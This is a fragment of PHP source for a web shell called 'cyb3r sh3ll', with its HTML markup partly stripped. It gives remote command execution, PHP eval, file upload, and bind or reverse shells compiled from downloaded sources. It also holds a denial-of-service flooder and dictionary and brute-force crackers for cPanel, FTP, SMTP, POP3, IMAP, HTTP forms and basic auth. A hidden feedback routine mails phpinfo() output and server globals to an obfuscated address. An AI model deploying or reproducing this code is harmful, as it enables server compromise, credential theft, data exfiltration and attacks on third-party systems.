    Proxy | Whois

    "; +} + + if ($act == "feedback") + +{ + + $suppmail = base64_decode("Y3liM3IuZ2xhZGlhdDByQGdtYWlsLmNvbQ=="); + + if (!empty($submit)) + + { + + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + + $body = "cyb3r sh3llv.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + + if (!empty($fdbk_ref)) + + { + + $tmp = @ob_get_contents(); + + ob_clean(); + + phpinfo(); + + $phpinfo = base64_encode(ob_get_contents()); + + ob_clean(); + + echo $tmp; + + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + + } + + mail($suppmail,"cyb3r sh3ll v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + + echo "
    Thanks for your feedback! Your ticket ID: ".$ticket.".
    "; + + } + + else {echo "
    Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

    Your name:

    Your e-mail:

    Message:


    Attach server-info *

    There are no checking in the form.

    * - strongly recommended, if you report bug, because we need it for bug-fix.

    We understand languages: English, Hindi.

    ";} + +} + +if ($act == "systeminfo") {echo system('systeminfo');} + +if ($act == "phpinfo") {@ob_clean(); phpinfo(); cyb3rexit(); } + +if ($act == "upload") + +{ + echo "File upload:
    + +Select file on your local computer:
                   or
    + +Save this file dir:

    + +File-name (auto-fill):

    + + + +
    "; +$target = $_POST['path']; + $target = $target .'\\'. basename( $_FILES['uploaded']['name']) ; + $ok=1; +if (isset($_FILES['uploaded']['name'])) { + if (file_exists($target)) + { + echo $_FILES["uploaded"]["name"] . " already exists. "; + } + else + { + if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target)) + { + echo "Upload: " . $_FILES["uploaded"]["name"] . "
    "; + echo "Type: " . $_FILES["uploaded"]["type"] . "
    "; + echo "Size: " . round(($_FILES["uploaded"]["size"] / 1024),3) . " Kb
    "; + echo "Stored in: " . $target; + } + else + { + echo "Sorry, there was a problem uploading your file."; + } + } + } +} +if ($act == "whois") +{ +global $t,$hcwd; +if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){ +$server =$_REQUEST['server']; +$domain=$_REQUEST['domain']."\r\n"; +$ser=fsockopen($server,43,$en,$es,5); +fputs($ser,$domain); +echo "
    ";
    +while(!feof($ser))echo fgets($ser);
    +echo "
    "; +fclose($ser); +} +else{ +echo "
    Whois:
    Server:
    domain:
    $hcwd
    "; +} +} + + + +if ($act == "cracker") +{ + echo " +
    +Hash -|- +SMTP -|- +POP3 -|- +IMAP -|- +FTP -|- +SNMP -|- +MySQL -|- +HTTP Form -|- +HTTP Auth(basic) -|- +CPANEL -|- +Dictionary Maker +

    "; +} + +if ($act == "shells") +{ ?> + + + + + + + + + + + + + +

    (: Bind/Reverse Shell :)

    [: Web Shell :]

    + array("Using PERL","perl %path %port"), + + "cyb3r_bindport.c"=>array("Using C","%path %port %pass") + + ); + + $bcsrcs = array( + + "cyb3r_backconn.pl"=>array("Using PERL","perl %path %host %port"), + + "cyb3r_backconn.c"=>array("Using C","%path %host %port") + + ); + + $dpsrcs = array( + + "cyb3r_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), + + "cyb3r_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") + + ); + + if (!is_array($bind)) {$bind = array();} + + if (!is_array($bc)) {$bc = array();} + + if (!is_array($datapipe)) {$datapipe = array();} + + + + if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} + + if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} + + + + if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} + + if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} + + + + if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} + + if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} + + if (!empty($bindsubmit)) + + { + + echo "Result of binding port:
    "; + + $v = $bndportsrcs[$bind["src"]]; + + if (empty($v)) {echo "Unknown file!
    ";} + + elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";} + + else + + { + + $w = explode(".",$bind["src"]); + + $ext = $w[count($w)-1]; + + unset($w[count($w)-1]); + + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + + $binpath = $tmpdir.join(".",$w).rand(0,999); + + if ($ext == "pl") {$binpath = $srcpath;} + + @unlink($srcpath); + + $fp = fopen($srcpath,"ab+"); + + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + + elseif (!$data = cyb3rgetsource($bind["src"])) {echo "Can't download sources!";} + + else + + { + + fwrite($fp,$data,strlen($data)); + + fclose($fp); + + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + + $v[1] = str_replace("%path",$binpath,$v[1]); + + $v[1] = str_replace("%port",$bind["port"],$v[1]); + + $v[1] = str_replace("%pass",$bind["pass"],$v[1]); + + $v[1] = str_replace("//","/",$v[1]); + + $retbind = myshellexec($v[1]." > /dev/null &"); + + sleep(5); + + $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); + + if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} + + else {echo "Binding... ok! Connect to ".getenv("SERVER_ADDR").":".$bind["port"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    View binder's process
    ";} + + } + + echo "
    "; + + } + + } + + if (!empty($bcsubmit)) + + { + + echo "Result of back connection:
    "; + + $v = $bcsrcs[$bc["src"]]; + + if (empty($v)) {echo "Unknown file!
    ";} + + else + + { + + $w = explode(".",$bc["src"]); + + $ext = $w[count($w)-1]; + + unset($w[count($w)-1]); + + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + + $binpath = $tmpdir.join(".",$w).rand(0,999); + + if ($ext == "pl") {$binpath = $srcpath;} + + @unlink($srcpath); + + $fp = fopen($srcpath,"ab+"); + + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + + elseif (!$data = cyb3rgetsource($bc["src"])) {echo "Can't download sources!";} + + else + + { + + fwrite($fp,$data,strlen($data)); + + fclose($fp); + + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + + $v[1] = str_replace("%path",$binpath,$v[1]); + + $v[1] = str_replace("%host",$bc["host"],$v[1]); + + $v[1] = str_replace("%port",$bc["port"],$v[1]); + + $v[1] = str_replace("//","/",$v[1]); + + $retbind = myshellexec($v[1]." > /dev/null &"); + + echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...
    "; + + } + + } + + } + + if (!empty($dpsubmit)) + + { + + echo "Result of datapipe-running:
    "; + + $v = $dpsrcs[$datapipe["src"]]; + + if (empty($v)) {echo "Unknown file!
    ";} + + elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";} + + else + + { + + $srcpath = $tmpdir.$datapipe["src"]; + + $w = explode(".",$datapipe["src"]); + + $ext = $w[count($w)-1]; + + unset($w[count($w)-1]); + + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + + $binpath = $tmpdir.join(".",$w).rand(0,999); + + if ($ext == "pl") {$binpath = $srcpath;} + + @unlink($srcpath); + + $fp = fopen($srcpath,"ab+"); + + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + + elseif (!$data = cyb3rgetsource($datapipe["src"])) {echo "Can't download sources!";} + + else + + { + + fwrite($fp,$data,strlen($data)); + + fclose($fp); + + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + + list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); + + $v[1] = str_replace("%path",$binpath,$v[1]); + + $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); + + $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); + + $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); + + $v[1] = str_replace("//","/",$v[1]); + + $retbind = myshellexec($v[1]." > /dev/null &"); + + sleep(5); + + $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); + + if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} + + else {echo "Running datapipe... ok! Connect to ".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    View datapipe process
    ";} + + } + + echo "
    "; + + } + + } + + ?>Binding port:
    Port: "> Password: ">  
    + +Back connection:
    HOST: "> Port: ">  
    + +Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p "!

    + +Datapipe:
    +
    +HOST: "> Local port: ">  
    Note: sources will be downloaded from remote server. + + + + +
    +

    [: Enter Command to Execute: :] + +

     


    +
    Useful Commands
    + + +
    + +
    + + + + + + + + + +   + + + +
    + + Warning. Kernel may be alerted using higher levels
    + +
    + +
    +
    Result of execution this command
    :
    "; + + $olddir = realpath("."); + + @chdir($d); + + $ret = myshellexec($cmd); + + $ret = convert_cyr_string($ret,"d","w"); + + if ($cmd_txt) + + { + + $rows = count(explode("\r\n",$ret))+1; + + if ($rows < 10) {$rows = 10;} + + echo "
    "; + + } + + else {echo $ret."
    ";} + + @chdir($olddir); + + } + + else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + + echo "


     Display in text-area 
    "; + +} + +} + +if ($act == "phpcode") +{ + echo " +
    +PHP Code Evaluate -|- +Mass Code Injector -|- +PHP Obfuscator -|- +Web Server Fuzzer +

    "; +} + +if ($act == "eval") + +{ + + if (!empty($eval)) + + { + + echo "Result of execution this PHP-code:
    "; + + $tmp = ob_get_contents(); + + $olddir = realpath("."); + + @chdir($d); + + if ($tmp) + + { + + ob_clean(); + + eval($eval); + + $ret = ob_get_contents(); + + $ret = convert_cyr_string($ret,"d","w"); + + ob_clean(); + + echo $tmp; + + if ($eval_txt) + + { + + $rows = count(explode("\r\n",$ret))+1; + + if ($rows < 10) {$rows = 10;} + + echo "
    "; + + } + + else {echo $ret."
    ";} + + } + + else + + { + + if ($eval_txt) + + { + + echo "
    "; + + } + + else {echo $ret;} + + } + + @chdir($olddir); + + } + + else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + + echo "


     Display in text-area 
    "; + +} + +if ($act == "proxy") +{ +global $errorbox,$et,$footer,$hcwd; +echo "
    Navigator: $hcwd
    "; +if (!empty($_REQUEST['urL'])){ +$dir=""; +$u=parse_url($_REQUEST['urL']); +$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; +if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/'))); +$url=@fsockopen($host, 80, $errno, $errstr, 12); +if(!$url)die("
    $errorbox Can not connect to host!$et$footer"); +fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); +while(!feof($url)){ +$con = fgets($url); +$con = str_replace("href=mailto","HrEf=mailto",$con); +$con = str_replace("HREF=mailto","HrEf=mailto",$con); +$con = str_replace("href=\"mailto","HrEf=\"mailto",$con); +$con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con); +$con = str_replace("href=\'mailto","HrEf=\"mailto",$con); +$con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con); +$con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con); +$con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con); +$con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con); +echo $con; +} +fclose($url); +} +} + + +if ($act == "obfuscate") +{ + if ( isset($_POST['code']) && + $_POST['code'] != '') + { + $encoded = base64_encode(gzdeflate(trim(stripslashes($_POST['code'].' '),''),9)); // high Compression! :P + $encode = ' + +'; + } + else + { + $encode = 'Please Enter your Code! and Click Submit! :)'; + }?> +
    +
    + +
    +

    $data

    "; + + print "cyb3r sh3ll is at its Work now :D ;D! Dont close this window untill you recieve a message
    "; + for($i=0;$i<$times;$i++) + { + $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout); + if($socket) + { + fwrite($socket , $data , $length ); + fclose($socket); + } + } + echo ""; + echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."
    "; + echo "Total Number of Packets Sent : " . $times . "
    "; + echo "Total Data Sent = ". showsizE($times*$length) . "
    "; + echo "Data per packet = " . showsizE($length) . "
    "; + } + else + { + ?> +
    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + IP + + +
    + Port + + +
    + Timeout + + +
    + No of times + + +
    + Message (The message Should be long and it will be multiplied with the value after it) + + + + x + + +
    + +
    +
    + +
    + +
    + + + + + +
    +

    + IP servers : +

    + + +
    User ListPassword List
    + +
    + Guess options +   + Cpanel (2082) + + Telnet(23) +
    + Timeout Delay +
    + Bruteforce +
    + Min Bruteforce Length: +
    + Max Bruteforce Length: + +

    +

    +
    +
    + +"; + cpanel_check($target,$pureuser,$firstVal,$connect_timeout); + + while (1) { + for ($i = 0; $i < ($max + 1); $i++) { + if ($A[$i] == -1) { + break; + } + } + $i--; + $incDone = 0; + while (!$incDone) { + for ($j = 0; $j < $numVals; $j++) { + if ($A[$i] == $vals[$j]) { + break; + } + } + if ($j == ($numVals - 1)) { + $A[$i] = $vals[0]; + $i--; + if ($i < 0) { + for ($i = 0; $i < ($max + 1); $i++) { + if ($A[$i] == -1) { + break; + } + } + $A[$i] = $vals[0]; + $A[$i + 1] = -1; + $incDone = 1; + print "Starting " . (strlen($currentVal) + 1) . " Characters Cracking
    "; + } + } else { + $A[$i] = $vals[$j + 1]; + $incDone = 1; + } + } + $i = 0; + $currentVal = ""; + while ($A[$i] != -1) { + $currentVal = $currentVal . $A[$i]; + $i++; + } + cpanel_check($target,$pureuser,$currentVal,$connect_timeout); + //echo $currentVal . "
    "; + if ($currentVal == $realMax) { + return 0; + } + } +} +function getmicrotimev() { + list($usec, $sec) = explode(" ",microtime()); + return ((float)$usec + (float)$sec); +} + +function ftp_check($host,$user,$pass,$timeout) +{ + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, "ftp://$host"); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); + curl_setopt($ch, CURLOPT_FTPLISTONLY, 1); + curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); + curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); + curl_setopt($ch, CURLOPT_FAILONERROR, 1); + $data = curl_exec($ch); + if ( curl_errno($ch) == 28 ) + { + print " + Error : Connection Timeout + Please Check The Target Hostname .

    ";exit; + } + else if ( curl_errno($ch) == 0 ) + { + print "[~] + Cracking Success With Username "$user\" + and Password \"$pass\"

    "; + } + curl_close($ch); +} +function cpanel_check($host,$user,$pass,$timeout) +{ + global $cpanel_port; + $ch = curl_init(); + //echo "http://$host:".$cpanel_port." $user $pass
    "; + curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); + curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); + curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); + curl_setopt($ch, CURLOPT_FAILONERROR, 1); + $data = curl_exec($ch); + if ( curl_errno($ch) == 28 ) + { + print " + Error : Connection Timeout + Please Check The Target Hostname .

    ";exit; + } + else if ( curl_errno($ch) == 0 ) + { + print "[~] + Cracking Success With Username "$user\" + and Password \"$pass\"

    "; + } + curl_close($ch); +} + +$time_start = getmicrotime(); + +if(isset($submit) && !empty($submit)) +{ + if(empty($users) && empty($pass) ) + { + print "

    Error : Please Check The Users or Password List Entry . . .

    "; exit; } + if(empty($users)){ print "

    Error : Please Check The Users List Entry . . .

    "; exit; } + if(empty($pass) && $_REQUEST['bruteforce']!="true" ){ print "

    Error : Please Check The Password List Entry . . .

    "; exit; }; + $userlist=explode("\n",$users); + $passlist=explode("\n",$pass); + print "[~]# + LETS GAME BEGIN ;) ...

    "; + + if(isset($_POST['connect_timeout'])) + { + $connect_timeout=$_POST['connect_timeout']; + } + + if($cracktype == "ftp") + { + foreach ($userlist as $user) + { + $pureuser = trim($user); + foreach ($passlist as $password ) + { + $purepass = trim($password); + ftp_check($target,$pureuser,$purepass,$connect_timeout); + } + } + } + + if ($cracktype == "cpanel" || $cracktype == "cpanel2") + { + if($cracktype == "cpanel2") + { + $cpanel_port="23"; + } + else + $cpanel_port="2082"; + + foreach ($userlist as $user) + { + $pureuser = trim($user); + print "[~]# + Please put some good password to crack user $pureuser :( ... "; + if($_POST['bruteforce']=="true") + { + echo " bruteforcing .."; + echo "
    "; + brute(); + } + else + { + echo "
    "; + foreach ($passlist as $password ) + { + $purepass = trim($password); + cpanel_check($target,$pureuser,$purepass,$connect_timeout); + } + } + } + $time_end = getmicrotime(); +$time = $time_end - $time_start; + print "[~]# + Cracking Finished. Elapsed time: $time seconds

    "; + } +} + + + +?> + + + + + + + + +
    + +

    + + + + + + + +
    +
    + + +
    +
    +
    + + +
    +
    +
    + + +
    +

    +
    + "; +} +} + +} +closedir($dh); +} +} +?> + + +
    + +Cracking " . htmlspecialchars($hash)."...
    ";flusheR(); +$type=($_REQUEST['type']=='MD5')?'md5':'sha1'; +while(!feof($dictionary)){ +$word=trim(fgets($dictionary)," \n\r"); +if ($hash==strtoupper(($type($word)))){echo "The answer is $word
    ";break;} +} +echo "Done!
    "; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} +echo "
    Hash cracker:
    Dictionary:
    Hash:
    Type:
    $hcwd
    "; +echo $eval_php_code; +} + +if ($act == "smtp") +{ +global $t,$et,$errorbox,$crack; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "Cracking ".htmlspecialchars($target)."...
    ";flusheR(); +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$smtp=smtplogiN($target,$user,$pass,5); +if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{ +if ($smtp){echo "U: $user P: $pass
    ";if(!$type)break;}} +flusheR(); +} +echo "
    Done
    "; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else +{ +echo "
    SMTP cracker:$crack"; +} + +echo "
    SMTP cracker:
    Dictionary:
    Dictionary type:Simple (P)Combo (U:P)
    Username:
    Server:
    "; + + +} + +if ($act == "pop3") +{ + +global $t,$et,$errorbox,$crack; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "Cracking ".htmlspecialchars($target)."...
    ";flusheR(); +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$pop3=pop3logiN($target,$user,$pass); +if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{ +if ($pop3){echo "U: $user P: $pass
    ";if(!$type)break;}} +flusheR(); +} +echo "
    Done
    "; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else +{ echo "
    POP3 cracker:$crack
    "; +} +echo "
    POP3 cracker:
    Dictionary:
    Dictionary type:Simple (P)Combo (U:P)
    Username:
    Server:
    "; + +} +if ($act == "ftp") +{ +global $errorbox,$t,$et,$crack; +if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et"; +else{ +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "Cracking ".htmlspecialchars($target)."...
    "; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;} +if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass
    ";if(!$type)break;} +ftp_close($ftp); +flusheR(); +} +echo "
    Done
    "; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} +else +{ +echo "
    FTP cracker:$crack
    "; +} +echo "
    FTP cracker:
    Dictionary:
    Dictionary type:Simple (P)Combo (U:P)
    Username:
    Server:
    "; + +} +} + +if ($act == "imap") +{ +global $t,$et,$errorbox,$crack; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "Cracking ".htmlspecialchars($target)."...
    ";flusheR(); +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$imap=imaplogiN($target,$user,$pass); +if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{ +if ($imap){echo "U: $user P: $pass
    ";if(!$type)break;}} +flusheR(); +} +echo "
    Done
    "; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else +{ +echo "
    IMAP cracker:$crack
    "; +} +print ('
    IMAP cracker:
    Dictionary:
    Dictionary type:Simple (P)Combo (U:P)
    Username:
    Server:
    '); + +} + +if ($act == "dic") +{ +global $errorbox,$windows,$footer,$t,$et,$hcwd; +if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0; +if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){ +$min = $_REQUEST['min']; +$max = $_REQUEST['max']; +if($max<$min)die($errorbox ."Bad input!$et". $footer); +$s =$w=""; +$out = $_REQUEST['output']; +$r = ($_REQUEST['range']=='a' )?'a':'A'; +if ($_REQUEST['range']==0) $r=0; +for($i=0;$i<$min;$i++) $s.=$r; +$dic = fopen($out,'a'); +if(is_nan($r)){ +while(strlen($s)<=$max){ +$w = $s; +if($combo)$w="$w:$w"; +fwrite($dic,$w."\n"); +$s++;} +} +else{ +while(strlen($w)<=$max){ +$w =(string)str_repeat("0",($min - strlen($s))).$s; +if($combo)$w="$w:$w"; +fwrite($dic,$w."\n"); +$s++;} +} +fclose($dic); +echo "Done"; +} +if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){ +$input=fopen($_REQUEST['input'],'r'); +if (!$input){ +if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et
    "; +else{ +$input=explode("\n",shelL("cat $input")); +$output=fopen($_REQUEST['output'],'w'); +if ($output){ +foreach ($input as $in){ +$user = $in; +$user = trim(fgets($in)," \n\r"); +if (!strstr($user,":"))continue; +$user=substr($user,0,(strpos($user,':'))); +if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n"); +} +fclose($input);fclose($output); +echo "Done"; +} +} +} +else{ +$output=fopen($_REQUEST['output'],'w'); +if ($output){ +while (!feof($input)){ +$user = trim(fgets($input)," \n\r"); +if (!strstr($user,":"))continue; +$user=substr($user,0,(strpos($user,':'))); +if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n"); +} +fclose($input);fclose($output); +echo "Done"; +} +else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et
    "; +} +}elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){ +$res=downloadiT($_REQUEST['url'],$_REQUEST['output']); +if($combo && $res){ +$file=file($_REQUEST['output']); +$output=fopen($_REQUEST['output'],'w'); +foreach ($file as $v)fwrite($output,"$v:$v\n"); +fclose($output); +} +echo "Done"; +}else{ +$temp=whereistmP(); +echo "
    + + +
    +Wordlist generator: + + + + + + + + + + +
    Range: + +
    Min lenght: + +
    Max lenght: + +
    Output:
    Combo style output
    $hcwd
    +
    +Grab dictionary: + + + + + + + + +
    Grab from:
    Output:
    Combo style output
    $hcwd
    +
    +Download dictionary: + + + +
    URL:
    Output:
    Combo style output
    $hcwd
    +
    +
    ";} +} + +if ($act == "htmlform") +{ +global $errorbox,$footer,$et,$hcwd; +if(!empty($_REQUEST['start'])){ +$url=$_REQUEST['target']; +$uf=$_REQUEST['userf']; +$pf=$_REQUEST['passf']; +$sf=$_REQUEST['submitf']; +$sv=$_REQUEST['submitv']; +$method=$_REQUEST['method']; +$fail=$_REQUEST['fail']; +$dic=$_REQUEST['dictionary']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer"); +$dictionary=fopen($dic,'r'); +echo "Cracking started...
    "; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$url.="?$uf=$user&$pf=$pass&$sf=$sv"; +$res=check_urL($url,$method,$fail,12); +if (!$res){echo "U: $user P: $pass
    ";flusheR();if(!$type)break;} +flusheR(); +} +fclose($dictionary); +echo "Done!

    "; +} +else echo "
    HTTP Form cracker:
    Dictionary:
    Dictionary type:Simple (P)Combo (U:P)
    Username:$hcwd
    Action Page:
    Method:
    Username field name:
    Password field name:
    Submit name:
    Submit value:
    Fail string:
    "; +} + +if ($act == "basicauth") +{ +global $errorbox,$et,$t,$crack,$hcwd; +if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$data=''; +$method=($_REQUEST['method'])?'POST':'GET'; +if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));} +spliturL($_REQUEST['target'],$host,$page); +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +if($method='GET')$page.=$data; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +echo ""; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$so=fsockopen($host,80,$en,$es,5); +if(!$so){echo "$errorbox Can not connect to host$et";break;} +else{ +$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass"); +if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data); +$packet.="\r\n\r\n"; +$packet.=$data; +fputs($so,$packet); +$res=substr(fgets($so),9,2); +fclose($so); +if($res=='20')echo "U: $user P: $pass
    "; +flusheR(); +} +} +echo "Done!
    "; +}else echo "
    +HTTP Auth cracker:
    Dictionary:
    Dictionary type:Simple (P)Combo (U:P)
    Username:
    Server:
    $hcwd
